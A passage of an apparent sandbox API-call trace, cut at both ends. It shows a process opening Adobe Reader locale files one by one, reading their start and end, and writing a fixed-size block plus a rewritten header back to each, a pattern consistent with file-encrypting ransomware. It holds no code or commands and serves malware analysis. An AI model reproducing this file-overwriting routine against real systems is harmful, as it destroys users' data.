lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.015] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e00 [0082.015] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.047] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e00 [0082.047] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.048] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.048] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.048] CloseHandle (hObject=0x1f0) returned 1 [0082.048] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9850 [0082.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.049] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.050] ReleaseMutex (hMutex=0x168) returned 1 [0082.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0082.050] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.063] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8850 [0082.063] ReadFile (in: hFile=0x1f0, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.064] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8850 [0082.064] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.065] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.065] WriteFile (in: hFile=0x1f0, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.065] CloseHandle (hObject=0x1f0) returned 1 [0082.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Annots.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\annots.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.066] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.066] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x76e00 [0082.066] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.066] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.066] ReleaseMutex (hMutex=0x168) returned 1 [0082.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.HRV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.HRV", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.HRV", lpUsedDefaultChar=0x0) returned 10 [0082.066] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.105] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x75e00 [0082.106] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.113] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x75e00 [0082.113] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.114] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.114] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.115] CloseHandle (hObject=0x1f0) returned 1 [0082.115] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\MakeAccessible.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\makeaccessible.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.115] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.116] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x12600 [0082.116] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.116] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.116] ReleaseMutex (hMutex=0x168) returned 1 [0082.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.HRV", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0082.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.HRV", cchWideChar=18, lpMultiByteStr=0x1f8867c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MakeAccessible.HRV", lpUsedDefaultChar=0x0) returned 18 [0082.117] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.127] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x11600 [0082.127] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.132] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x11600 [0082.133] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.133] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.133] WriteFile (in: hFile=0x1f0, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.133] CloseHandle (hObject=0x1f0) returned 1 [0082.134] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Search.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\search.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5c00 [0082.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.134] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.134] ReleaseMutex (hMutex=0x168) returned 1 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.HRV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.HRV", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.HRV", lpUsedDefaultChar=0x0) returned 10 [0082.134] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.141] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4c00 [0082.141] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.155] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4c00 [0082.156] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.156] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.156] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.157] CloseHandle (hObject=0x1f0) returned 1 [0082.157] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Acroform.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\acroform.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.158] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.158] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x68600 [0082.158] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.158] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.158] ReleaseMutex (hMutex=0x168) returned 1 [0082.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.HUN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.HUN", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.HUN", lpUsedDefaultChar=0x0) returned 12 [0082.159] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.167] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x67600 [0082.167] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.179] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x67600 [0082.180] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.180] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.180] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.181] CloseHandle (hObject=0x1f0) returned 1 [0082.181] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\EScript.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\escript.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.181] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.181] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa200 [0082.182] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.182] ReleaseMutex (hMutex=0x168) returned 1 [0082.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.HUN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0082.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.HUN", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.HUN", lpUsedDefaultChar=0x0) returned 11 [0082.182] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.194] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9200 [0082.194] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.194] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9200 [0082.195] WriteFile (in: hFile=0x1f0, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.195] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.195] WriteFile (in: hFile=0x1f0, lpBuffer=0x25aa0a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa0a8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.195] CloseHandle (hObject=0x1f0) returned 1 [0082.196] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\reflow.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\reflow.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.196] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.196] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1200 [0082.196] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.196] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.196] ReleaseMutex (hMutex=0x168) returned 1 [0082.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.HUN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.HUN", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.HUN", lpUsedDefaultChar=0x0) returned 10 [0082.197] ReadFile (in: hFile=0x1f0, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x331f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0082.200] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0082.201] WriteFile (in: hFile=0x1f0, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x331f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0082.201] CloseHandle (hObject=0x1f0) returned 1 [0082.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\WebLink.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\weblink.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.202] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.202] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7200 [0082.202] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.202] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.203] ReleaseMutex (hMutex=0x168) returned 1 [0082.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.HUN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0082.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.HUN", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WebLink.HUN", lpUsedDefaultChar=0x0) returned 11 [0082.203] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.622] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, 